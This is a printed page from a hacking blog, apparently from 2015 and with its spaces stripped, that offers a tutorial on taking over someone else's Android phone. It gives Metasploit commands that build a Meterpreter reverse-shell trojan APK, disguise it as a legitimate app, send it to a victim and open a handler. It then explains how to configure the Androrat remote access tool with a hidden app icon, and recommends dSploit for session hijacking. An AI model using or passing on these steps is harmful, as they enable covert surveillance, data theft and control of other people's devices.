You are on page 1of 5

12/19/2015

androrat|Haxf4rall

Close

Haxf4rall
Hacking,ITsecurity,Cyberawareness

Tag:androrat

HowtoHackanandroidphone
October21,2014August31,2015Haxf4rALL9Comments

Inthistutorialiwillshowyouaguideonhowto
hacksomeonesandroidphone.
Firstyouwillneedtorootyourphone(Imnotgoingtoshowyouhowtorootyourphoneon
thistut,butwillpostoneinthefuture)forthistoworkonall3methods.Ifyouarenotsure
thatitisrooted,justdownloadrootchecker(http://adf.ly/19D9Kj)ongoogleplayanditwill
showyouifyourphonehasbeensuccessfullyrooted.
NoteIwillnotbeheldresponsibleforanybodiesactions,asthistutorialisforeducational
purposes.

http://haxf4rall.com/tag/androrat/

1/5

12/19/2015

androrat|Haxf4rall

Method1(CreateyourownRatapkfile)
Youwillneedbacktrackorkalilinux,itsavailableontheirsiteforfreeat
http://www.kali.org/downloads/.(http://adf.ly/19D9lO)Openupyournewoperatingsystem
usingVMWareorbymakingabootableUSB.Heresthe2toolsthatyouwillneed,eitherway
willwork.
VMWareworkstation(http://adf.ly/19DA5w)
RUFUS(http://adf.ly/19DB1w)
WhenyouhavesuccessfullybootedintotheOS,simplyclickthefirstoptionDefaultboottext
modeandthenawindowwillpopupthatlookssimilartocommandprompt.Typeinstartx
andyouwillbeintheGUIoftheOS.Nowwecanfinallystartwiththehackingphase.First
gototheterminal.Typeinthefollowingcommands.
1.aptgetupdate(makesureyouareconnectedtotheinternet)
2.msfconsole
waituntilthecommandfullyloaded(dependsonyourpcspecs,itcantakesometime)
3.Executethiscommandinmetasploitconsole
Msfpayloadandroid/meterpreter/reverse_tcpLHOST=<yourinternalIP>LPORT=<portfor
connection>R>trojan.apk
4.Thentransfertrojan.apktoyourandroiddeviceandinstallAPKEditorfromgoogleplayto
editthetrojan.apk(changeiconandnames)sothatitlookslikealegitimateapp.

5.Sendthisapkfileovertoyourvictimsphone.

http://haxf4rall.com/tag/androrat/

2/5

12/19/2015

androrat|Haxf4rall

5.Sendthisapkfileovertoyourvictimsphone.
6.Nowgoingbacktoyouropenmsfconsolewindow,typeinthefollowingtostartyour
trojan.apk
7.useexploit/multi/handler
8.setlport<theportyouusedintrojan.apk>
9.exploit
Note**DontforgettomakeyourIPstatic,asyoudontwantyouriptochangeotherwisethis
wontwork**
Andviola!!,younowhavecontrolofyourvictimsphone.
Youcanaccessthevictimsdirectories,frontbackcameraandmanymore.

Method2(UsingAndrorat)
Androratisaclient/serverapplicationdevelopedinJavaAndroidfortheclientsideandin
Java/SwingfortheServer.ThenameAndroratisamixofAndroidandRAT(RemoteAccess
Tool).Thegoaloftheapplicationistogivethecontroloftheandroidsystemremotelyand
retrieveinformationsfromit.
Features
Getcontacts(andalltheirsinformations)
Getcalllogs
Getallmessages
LocationbyGPS/Network
Monitoringreceivedmessagesinlive
Monitoringphonestateinlive(callreceived,callsent,callmissed..)
Takeapicturefromthecamera
Streamsoundfrommicrophone(orothersources..)
Streamingvideo(foractivitybasedclientonly)
Doatoast
Sendatextmessage
Givecall
OpenanURLinthedefaultbrowser
Dovibratethephone

HowtoconfigureAndrorat:
1. YouhavetomakeaidonHere(http://adf.ly/19DBPd)andcreateahost.
2. Youneedtoopenportyouwanttouse.TodothatOpenControlpanel>Network&
Internet>Network&SharingcentreThenclickonseefullmapoptionRightClickonthe
http://haxf4rall.com/tag/androrat/
Gatewayorrouter>PropertiesIngeneraltab,Gotosettings,ClickonaddInDescriptionof

3/5

androrat|Haxf4rall
Internet>Network&SharingcentreThenclickonseefullmapoptionRightClickonthe
Gatewayorrouter>PropertiesIngeneraltab,Gotosettings,ClickonaddInDescriptionof
service,WriteAndroratNowyouhavetocheckyourip,ToDothis,opencommand
prompt,typeipconfig,ScrollToethernetAdapterlocalareaconnection,andnotedownthe
ipv4addressNowcomebacktoAddwindow,inthenameoripaddresstypetheipv4
addressyouhavenotedNowintheexternal&internalportnumber,type81,tcpshouldbe
selected,clickokNowclickonAddbuttonagainNowinDescription,writeandrorat1In
thenameoripaddress,typetheipv4addressyouhavenotedNowintheexternal&internal
portnumber,type81,udpshouldbeselected,clickok.
Nowextractthefile,OpenAndroRatBinder.exe.
GotoNoiptabandfillyourinformation&clickonupdate.
GotoBuildTab.
InIPsection,typethehostnameyouhavecreatedbynoip.
Inportsection,type81.
Inapktitle,Typeanytitleyouwant.
Checkthehiddenboxtohidetheapkfrommobilesappdrawer.
ClickonGo.
Nowyouwillseetheapkwiththetitleyouhavegivenintheextractedfolder.
Nowinstallthatapktoanyandroidmobilephone.
YouwillfindafoldernamedAndroratintheextractedfiles.
OpenAndrorat>Androrat.jar(youshouldhavejavainstalledinyourpctoopenit).
Nowclickonserver>Selectportandenter81,clickok&restartit.
Now,assoonastheandroidclientisonline,youwillfinditonthejarfileselectany
serveronline.
Enjoy.

12/19/2015

3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.

DownloadAndrorat(http://adf.ly/1NTr1T)

Method3(UsingDsploit)
Forthishackapptowork,youneedtobeonthesamenetworkasthevictim.
Sowhatdoesthisapphavetooffer?Justabouteverything.Passwordrecovery,killconnections
,Sessionhijacker(facebook,youtubeetc.),siteredirector,imagereplacerandmanymore.
Simplydownloadtheappandinstall.Youwillbeamazedhowmuchpowerthisappprovides.
DownloadDsploit(http://adf.ly/1NXJAu)

Ifanyonehaveanyproblemssettingoneup,PMmeforhelpandonceagainthisisfor
educationalpurposes.
http://haxf4rall.com/tag/androrat/

4/5

12/19/2015

androrat|Haxf4rall

BlogatWordPress.com.|TheNucleareTheme.

http://haxf4rall.com/tag/androrat/

5/5